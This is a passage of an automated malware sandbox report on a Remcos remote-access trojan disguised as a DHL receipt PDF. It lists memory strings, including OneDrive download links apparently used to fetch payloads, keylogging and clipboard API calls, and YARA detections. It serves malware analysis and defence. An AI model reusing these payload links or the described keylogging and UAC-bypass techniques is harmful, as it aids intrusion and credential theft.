              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: remcos.exe, 00000014.00000002.1856718053.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: DHL119040 receipt document,pdf.exe, DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp, yfkwifxL.pif, yfkwifxL.pif, 00000001.00000001.1712591373.0000000000418000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000000.1711928775.0000000000416000.00000002.00000001.01000000.00000005.sdmp, yfkwifxL.pif, 00000001.00000001.1712591373.000000000044B000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000002.1876666457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yfkwifxL.pif.0.drString found in binary or memory: http://www.pmail.com
              Source: bhvC179.tmp.20.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhvC179.tmp.20.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhvC179.tmp.20.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhvC179.tmp.20.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhvC179.tmp.20.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhvC179.tmp.20.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhvC179.tmp.20.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhvC179.tmp.20.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
              Source: bhvC179.tmp.20.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhvC179.tmp.20.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhvC179.tmp.20.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: bhvC179.tmp.20.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvC179.tmp.20.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhvC179.tmp.20.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhvC179.tmp.20.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhvC179.tmp.20.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvC179.tmp.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=0000
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: remcos.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: remcos.exe, 0000002C.00000002.2022678226.000000000289C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/D
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/J
Source: remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4
Source: remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtd
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sx
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com/y4myOimuUAmzYYCQg7S5DPHrV2LTkb-aNzDgiFFvLFPMKX5riRJbzax3M8WqO_jLV-z
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyv
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51
Source: remcos.exe, 00000005.00000002.4124047800.0000000000647000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANi
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6R
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: remcos.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvC179.tmp.20.dr | String found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4A2B8 SetWindowsHookExA 0000000D,2DA4A2A4,00000000
Source: C:\ProgramData\Remcos\remcos.exe | Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA568C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match | File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

              E-Banking Fraud

Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5C9E2 SystemParametersInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5BC9E2 SystemParametersInfoW
Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

              System Summary

Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
